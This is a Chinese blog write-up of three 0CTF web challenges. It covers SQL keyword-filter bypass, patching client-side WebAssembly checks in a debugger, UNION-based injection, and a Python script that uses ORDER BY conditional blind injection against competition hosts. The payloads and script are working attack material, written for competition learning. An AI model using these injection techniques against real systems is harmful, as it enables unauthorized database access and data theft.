0ctf 部分web writeup.md

最新推荐文章于 2022-01-12 10:52:06 发布
最新推荐文章于 2022-01-12 10:52:06 发布
阅读量1.4k 收藏
点赞数
分类专栏: WriteUp 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ni9htMar3/article/details/64522738
版权

simplesqlin

这个题尝试点击,注入点是id,发现他把一些关键字符过滤了,如selectfrom 等,那样经过查找资料,可利用/**/00%0b绕过过滤,经过尝试%00%0b都可以,那样构造payload
得到数据库news
这里写图片描述

得到表flag
这里写图片描述

得到列flag
这里写图片描述

最终得到flag
这里写图片描述

KoG

King of Glory is a funny game. Our website has a list of players.

查看源码,是一道关于js的题

function GetUrlParms()
{
    var args=new Object();
    var query=location.search.substring(1);
    var pairs=query.split("&");
    for(var i=0;i<pairs.length;i++)
    {
        var pos=pairs[i].indexOf('=');
        if(pos==-1) continue;
        var argname=pairs[i].substring(0,pos);
        var value=pairs[i].substring(pos+1);
        args[argname]=unescape(value);
    }
    return args;
}
function go()
{
    args = GetUrlParms();
    if(args["id"]!=undefined)
    {
        var value = args["id"];
        var ar = Module.main(value).split("|");
        if(ar.length==3)
        {
            var s = "api.php?id=" + args["id"] + "&hash=" + ar[0] + "&time=" + ar[1];
            $(document).ready(function(){
              content=$.ajax({url:s, async:false});
              $("#output").html(content.responseText);
            });

        }
        if((ar.length==1)&(ar[0]=='WrongBoy'))
        {
            alert('Hello Hacker~');
        }
    }
}

var wait = setInterval(function(){if(Module.main != undefined){clearInterval(wait);go();}}, 100);

这个当你输入带有敏感的字符,便会返回wrongBoy,并弹窗

这样的话,只要利用chrome进行单步调试,将不一样的判断语句除掉就可以

通过不间断的调试,可知道第一个不一样的地方,这时将$13true就可以

第二个位置就是$42的值,当正确的时候$42true,致使label0,而错误的时候label12进入中断,这样只要使if(0)就可以
之后就能正常的注入了,不过由于同源策略的原因,异步请求交不过去,所以把源码改成如下

<!DOCTYPE html> <html> <head> <title>King of Glory Player List</title> </head> <body> <script
  src="https://code.jquery.com/jquery-3.1.1.min.js"
  integrity="sha256-hVVnYaiADRTO2PzUGmuLJr8BLUSjGIZsDYGmIJLv2b8="
  crossorigin="anonymous"></script> <script src="function1.js"></script> <script type="text/javascript">
function GetUrlParms()
{
    var args=new Object();
    var query=location.search.substring(1);
    var pairs=query.split("&");
    for(var i=0;i<pairs.length;i++)
    {
        var pos=pairs[i].indexOf('=');
        if(pos==-1) continue;
        var argname=pairs[i].substring(0,pos);
        var value=pairs[i].substring(pos+1);
        args[argname]=unescape(value);
    }
    return args;
}
function go()
{
    args = GetUrlParms();
    if(args["id"]!=undefined)
    {
        var value = args["id"];
        var ar = Module.main(value).split("|");
        if(ar.length==3)
        {
            var s = "http://202.120.7.213:11181/api.php?id=" + args["id"] + "&hash=" + ar[0] + "&time=" + ar[1];
            window.location.href=s;
            $(document).ready(function(){
              content=$.ajax({url:s, async:false});
              $("#output").html(content.responseText);
            });

        }
        if((ar.length==1)&(ar[0]=='WrongBoy'))
        {
            alert('Hello Hacker~');
        }
    }
}

var wait = setInterval(function(){if(Module.main != undefined){clearInterval(wait);go();}}, 100);

</script> <center><h1>King of Glory Player List</h1></center> <center><div id="output"><h2>hmmmm</h2></div></center> </body> </html>

function1.js就是我们调整过得,接下来就能正常的发送请求了。

发现服务端并没有再进行过滤了,然后由这个payload

id=1 order by 2

确定是2列了。
然后开始爆破
表名有fl4g,user
fl4g列名就一个hey
所以

?id=1 and 1=2 union select 1,hey from fl4g

拿到flag。
这里写图片描述

Temmo’s Tiny Shop

Enjoy online shopping? It’s so convenient, and I like it very much.

这是一道条件竞争的题,当有钱后买hint

select flag from ce63e444b0d049e9c899c9a0336b3c59

这明显就是注入题,首先找注入点在哪
发现在搜索的orderby处
这里写图片描述

这里写图片描述

通过if语句进行逐字判断

脚本

import requests
import string 

dic=string.ascii_letters+'0123456789~!*()-{}_'
r=requests.session()
url = 'http://202.120.7.197/app.php'  
header={"Cookie":"PHPSESSID=3lqjrmgiuurlnmgerokt0kk8o6"}

def sendsort(TEMPLATE):  
    data = TEMPLATE
    #print data
    content=r.get(url+data,headers=header).content
    if content.find('"id":"5"')>content.find('"id":"2"'): 
        return 1  
    else:  
        return 0   
TEMPLATE = "?action=search&keyword=&order=if(substr((select(flag)from(ce63e444b0d049e9c899c9a0336b3c59)),%d,1)like(%s),price,name)"
flag = []  

for i in range(1,40):
    for j in dic:
        print j,
        if sendsort(TEMPLATE%(i,hex(ord(j)))) == 1:
            print 'ok' 
            flag.append(j)
            break
        else:
            print 'no'

print 'Flag:',''.join(flag)

得到flag
这题好坑,爆出来好多_%,还不区分大小写
这里写图片描述

「已注销」
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
备战CTF做题题解
weixin_40707492的博客
07-21 6366
备战CTF初期,没有什么经验,部分操作过程有借鉴大佬
CTF工具之WEB.zip
10-07
【标题】:CTF工具之WEB.zip 【正文】: CTF(Capture The Flag)是一项网络安全竞赛,参与者通过解决各种安全挑战来展示他们的技术技能。这个名为“CTF工具之WEB.zip”的压缩包,显然是专门为参与此类比赛的选手...
某行业_CTF部分Writeup
Keepb1ue的博客
01-12 7366
目录WEB简单的Web足迹NoRCEGiveMeSecretMisc不止止base64失眠的夜High quality men WEB 简单的Web <?php highlight_file(__FILE__); error_reporting(0); echo "try to read source ?action="; $action = $_GET['action']; if (isset($action)) { if (p
CTF-writeup
03-19
CTF-writeup
CTFWeb-BUUCTF竞赛真题WriteUp(1)
道阻且长,行则将至。
08-20 7813
BUUCTF (北京联合大学CTF)平台拥有大量免费的 CTF 比赛真题环境: 此处记录下部分 Web 题目练习过程。 N0.1 强网杯-高明的黑客 1、创建并访问靶机: 2、根据题目提示,访问并下载 www.tar.gz: 打开压缩包,发现有3000多个php文件,尝试搜索flag文件,未果。于是打开php文件进行代码审计,发现代码中存在大量使用 system()/eval()/assert() 等函数执行 get 或 post 传递的参数,这意味我们也许可以通过传递参数的方式来执行任意命令。
23. CTF综合靶机渗透(十六)
weixin_30564785的博客
08-19 1088
靶机说明: VM Name: JIS-CTF : VulnUpload Difficulty: Beginner Description: There are five flags on this machine. Try to find them. It takes 1.5 hour on average to find all flags. Only working with Virt...
自己ctf比赛的writeup.zip
10-01
CTF(Capture The Flag)比赛中,Writeup通常是指参赛者对比赛过程、解题思路以及解决方案的详细记录。这个“自己ctf比赛的writeup.zip”文件很可能包含了作者在参与CTF比赛时的全部心得体验,包括但不限于解题...
逆向ctf题做法总结.md
10-05
这是一份逆向ctf题做法的总结文档,给一个逆向CTF题总体的介绍,便于新手有整体概念和针对性提升,适合有一定程度的CTF逆向选手。
Ant x D^3 CTF Official Writeup.pdf
03-22
Ant x D^3 CTF Official Writeup.pdf
ctf总结.md
05-14
自己在做CTF过程中做的总结下面中实验室指的是网络安全实验室 题目全部来自bugku,南邮和网络安全实验室,题较基础,实验吧要复杂些 文中所有知识点内容并不全,要学习原理及深入得自己去找资源学习 看这个的时候,...
某校赛的题解...再膜鸡哥
Assassin
10-02 1085
真是菜的一逼…WEB生疏了小小总结一下。 两道0ctf的原题0ctf Temmo’s Tiny Shop part1打开了首先发现了再搜索的order位置存在过滤Waf,感觉是一个注入,但是只是一个猜想,但是感觉过滤的东西实在是太多了…以为思路错了…转而一想是不是买和卖的条件竞争呢?但是一开始一直卡在同一用户为啥不行????然后换了个套路用不同的套接字就行了…用两个cookie,gg,我用的两
南邮CG-CTFWeb writeup第二部分
Senimo
08-04 1426
南邮CG-CTFWeb writeup第二部分伪装者Header上传绕过SQL注入1pass check起名字真难密码重置php 反序列化SQL Injection综合题systemSQL注入2综合题2密码重制2file_get_contents变量覆盖2注意!!HateITAnonymous 南邮CG-CTF链接 伪装者 Header 上传绕过 SQL注入1 pass check 起名字真难 ...
CTF条件竞争
夏日 の blog
02-10 2618
简介 条件竞争是指一个系统的运行结果依赖于不受控制的事件的先后顺序。当这些不受控制的事件并没有按照开发者想要的方式运行时,就可能会出现 bug。尤其在当前我们的系统中大量对资源进行共享,如果处理不当的话,就会产生条件竞争漏洞。 个人理解 通俗的来讲就是假设程序同时处理存钱和取钱,当取钱"速度"大于存钱时,可能就会出现取钱后程序还未来得及将金额减少,程序又立马处理存钱,由此产生非预期的结果。 竞争...
FireShell CTF 2019小记
郁离歌丶的博客
03-20 1001
FireShell CTF 2019小记 8说了,国际赛的难度大家都晓得滴。看题 Python Learning Environment 沙盒逃逸orz,最近喜欢玩的一个东东。 在前端的python.js里面可以看到一些waf源码。不过还没有我自己fuzz来的快,毕竟前端也不是很熟,源码又太多。 fuzz结果:不能用数字,不能用[],还有一堆常见的关键词需要绕过。以及内置函数只剩下exec和pri...
0CTF2017 WEB WriteUp
Bendawang's Blog
03-20 9736
0CTF2017 WEB WriteUp
mysql 00FALSE_False注入,以及SQL注入技巧总结
weixin_34976470的博客
01-30 407
title: False注入,以及SQL注入技巧总结date: 2017-04-25 00:23:31tags: ['SQL注入']利用False我们可以绕过一些特定的WAF以及一些未来不确定的因素,其中有些姿势之前了解但是没有去深入,这次做一个归纳总结。0x01 False Injection0 :引子首先我们常见的注入1=10<1''=''这些都是基于1=1这样的值得比较的普通注入,下面...
实战:2019 0ctf final Web Writeup(一)
systemino的博客
07-04 1031
前言 鸽了好久的题解,因为自己事务缠身,一直没时间写一下最近比赛的题解,趁近日有空,来填坑~ 第一次参加0ctf新星赛就拿了冠军,还是非常开心的。比赛过程中,web共4道题,我有幸做出3道,java实在不太擅长,哭了(另一道是ocaml的题目,涉及小trick和逻辑问题,准备放在后面和java一起编写(希望不要咕咕咕了)。这里写出另外两道题目的题解如下: 114514_calcalcalc ...
window.location.search.substring(1);的含义
KLW75
09-27 5360
一句话总结 window.location.search.substring(1) 是截取当前 url 地址?后面所有的内容。 解释: window.location 对象用于获得当前页面的地址 (URL),并把浏览器重定向到新的页面。 window.location 对象所包含的属性中 search表示从问号 (?) 开始的 URL(查询部分) 所以window.location.search表示包含?的所有内容。 window.location.search.subst...
ctf.show_web5
最新发布
10-22
ctf.show_web5是一个CTF比赛中的WEB模块第5关,需要传递两个参数v1和v2,要求v1必须是纯字母字符串,v2必须是数字或数字字符串,并且两个参数的md5值必须相等。可以利用md5的0e漏洞进行绕过。具体来说,可以构造一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值